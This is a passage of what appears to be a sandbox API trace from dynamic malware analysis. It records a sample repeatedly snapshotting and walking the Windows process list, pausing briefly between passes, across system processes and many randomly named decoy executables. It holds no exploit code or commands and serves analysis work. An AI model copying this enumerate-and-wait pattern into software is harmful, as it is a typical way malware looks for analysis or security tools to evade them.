th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0106.465] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0106.466] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0106.466] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0106.467] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0106.468] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0106.468] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0106.469] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0106.470] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0106.470] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2e, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0106.471] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0106.472] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0106.472] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0106.473] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0106.474] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0106.475] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0106.476] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0106.477] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0106.479] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0106.490] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0106.491] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0106.492] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0106.493] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0106.494] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0106.495] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0106.496] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0106.497] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0106.498] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0106.499] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0106.500] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0106.501] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0106.502] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0106.503] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0106.505] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0106.505] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0106.506] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0106.507] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0106.509] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0106.509] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0106.511] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0106.512] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0106.512] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0106.513] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0106.514] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xba4, pcPriClassBase=8, dwFlags=0x0, szExeFile="LSfkRHur.exe")) returned 1 [0106.515] CloseHandle (hObject=0xbc) returned 1 [0106.515] Sleep (dwMilliseconds=0x12c) [0106.830] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0106.835] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0106.836] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0106.837] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0106.838] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0106.838] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0106.839] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0106.840] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0106.841] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0106.841] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0106.842] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0106.843] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0106.843] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0106.844] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0106.845] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0106.846] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2e, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0106.846] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0106.847] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0106.855] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0106.856] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0106.857] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0106.859] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0106.860] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0106.861] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0106.863] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0106.864] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0106.866] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0106.867] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0106.868] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0106.869] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0106.870] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0106.871] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0106.872] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0106.873] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0106.882] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0106.883] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0106.885] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0106.886] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0106.887] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0106.888] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, 